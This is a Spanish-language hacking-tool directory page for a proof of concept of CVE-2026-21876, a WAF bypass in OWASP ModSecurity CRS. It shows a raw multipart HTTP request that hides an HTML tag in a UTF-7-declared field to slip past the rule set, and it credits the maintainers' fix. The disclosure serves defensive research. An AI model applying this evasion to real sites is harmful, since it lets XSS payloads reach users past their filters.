Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-21876 — PoC mínimo y contenedor Docker que demuestran una evasión de WAF en OWASP ModSecurity CRS mediante el manejo de charset multipart, lo que permite la entrega de payloads XSS. | Kitploit
Herramientas/GitHubGitHub/mefhika120/cve-2026-21876
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebEvasión de WAFPruebas de Penetración
GitHubmefhika120/cve-2026-21876

CVE-2026-21876

PoC mínimo y contenedor Docker que demuestran una evasión de WAF en OWASP ModSecurity CRS mediante el manejo de charset multipart, lo que permite la entrega de payloads XSS.

Ver Repositorio
hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-21876 (Bypass de WAF de OWASP CRS)

Contenedor docker de CVE-2026-21876 + PoC mínimo.

Quiero agradecer por separado a @airween y a @fzipi por su rápida respuesta. ¡La corrección de la vulnerabilidad estuvo lista en muy poco tiempo!

PoC

root@kitploit:~
POST /submit HTTP/1.1
Host: localhost
User-Agent: curl/8.17.0
Accept: */*
Origin: https://example.com
Content-Length: 367
Content-Type: multipart/form-data; boundary=------------------------cmOi6twNhVJDu76bOwDTVz

--------------------------cmOi6twNhVJDu76bOwDTVz
Content-Disposition: form-data; name="username"
Content-Type: text/plain; charset=utf-7

+ADw-img+ACA-src+AD0-x+AD4-
--------------------------cmOi6twNhVJDu76bOwDTVz
Content-Disposition: form-data; name="dummy"
Content-Type: text/plain; charset=utf-8

dummy
--------------------------cmOi6twNhVJDu76bOwDTVz--

El valor de username no se comprueba para detectar caracteres que no estén incluidos en la lista blanca, lo que provoca un bypass del WAF.

Demostración del bypass

изображение

El mismo payload está bloqueado aquí

изображение

Referencias

  • Aviso de seguridad de Github
  • Artículo de blog sobre el recorrido de OWASP CRS
  • Mi historia de descubrimiento en Medium
Descargar herramienta